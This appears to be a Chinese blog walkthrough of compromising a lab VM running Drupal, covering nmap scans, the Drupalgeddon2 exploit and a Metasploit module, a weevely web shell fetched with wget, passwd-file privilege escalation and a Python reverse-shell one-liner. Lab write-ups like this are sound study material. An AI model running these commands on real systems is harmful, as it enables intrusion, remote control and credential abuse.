ifconfig
nmap -sP 192.168.138.0/24
nmap -sTV -p- -Pn 192.168.138.129
22 端口 :SSH 服务端口,可能存在 弱口令和暴利破解
80 端口 :HTTP端口,可以通过目录扫描,去发现网站目录或者网站源码泄露或者备份文件泄露
探测到的网站目录信息:
http://192.168.138.129/drupal
http://192.168.138.129/index.html
http://192.168.138.129/serverstatus
http://192.168.138.129/drupal/includes
http://192.168.138.129/drupal/index.php
http://192.168.138.129/drupal/misc/
http://192.168.138.129/drupal/modules/
http://192.168.138.129/drupal/profiles/
http://192.168.138.129/drupal/robots.txt
http://192.168.138.129/drupal/scripts/
http://192.168.138.129/drupal/sites/
http://192.168.138.129/drupal/themes/
http://192.168.138.129/drupal/web.config
http://192.168.138.129/drupal/xmlrpc.php
git clone https://github.com/dreadlocked/Drupalgeddon2.git
在运行脚本前,需要预装依赖包 highline
gem install highline
./drupalgeddon2.rb http://192.168.X.X/drupal/ (靶机IP地址)
查看权限:
id
查看目录文件:
ls -lh
生成木马:
weevely generate hello ./door.php
打开kali web服务器:
python -m SimpleHTTPServer
在靶机上使用wget工具下载 kali 上生成的木马文件:
wget http://192.168.x.x:8000/door.php
浏览用户目录:查看是否存在对我们有用的信息
cd /home
ls -lh
cd james
ls -lh
cat user.txt
bae11ce4f67af91fa58576c1da2aad4b 解码失败
切换到网站根目录:
cd /var/www/html
ls -lh
cat alexander.txt 在这个文件中发现一串base64编码的密文
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==
+++++ +++++ [->++ +++++ +++<] >++++ ++.-- ----- --.<+ ++[-> +++<] >+++.----- ---.< +++[- >+++< ]>+++ ++.<+ +++++ +[->- ----- -<]>- ----- --.<+++[-> +++<] >++++ +.<++ +++[- >++++ +<]>. ++.++ +++++ +.--- ---.< +++[->+++< ]>+++ +.<++ +++++ [->-- ----- <]>-. <+++[ ->--- <]>-- -.+.- ---.+++.<
Brainfuck解密网站:
https://www.splitbrain.org/services/ook
https://www.dcode.fr/brainfuck-language
audit_suidsgid -only-suid /
cd /etc # 切换到 /etc目录下
python3 -m http.server 8888 # 在靶机上开启一个临时web服务
wget http://192.168.x.x:8888/passwd # 在kali上密码文件下载到本地
openssl passwd -1 -salt 账号 密码 # 利用openssl工具做加密
python3 -m http.server 9999 # 在kali上开启一个临时web服务
wget http://192.168.1.7:9999/passwd -0 passwd # 在靶机上,将passwd文件从kali上下载到靶机上来
su xiaohuang # 切换用户,切换到你刚才设置的
msfconsole # 开启msf
search drupal # 搜索漏洞组件
use exploit/unix/webapp/drupal_drupalgeddon2(use 模块名称 ) # 选择使用的工具模块
set payload php/meterpreter/reverse_tcp(set payload + 给出指定路径) # 设置payload
set rhosts 192.168.58.156(目标靶机IP地址) # 设置攻击目标
set lhost 192.168.58.130(攻击机IP地址) # 设置本地监听
set TARGETURI /drupal(目标靶机IP地址) # 设置drupal网站路径
run # 开始攻击
尝试使用NC 反弹一个交互式 shell:
nc -lvvp 4444 # 开启本地监听
meterpreter > shell # 写入shell
shell: 需要写入自己的监听地址
python3 -c'import pty; pty.spawn("/bin/bash")'
或
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("本机监听IP地址",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
各位路过的朋友,如果觉得可以学到些什么的话,点个赞 再走吧,欢迎各位路过的大佬评论,指正错误,也欢迎有问题的小伙伴评论留言,私信。
每个小伙伴的关注都是本人更新博客的动力!!!
请微信搜索【 在下小黄 】文章更新将在第一时间阅读 !
博客中若有不恰当的地方,请您一定要告诉我。前路崎岖,望我们可以互相帮助,并肩前行!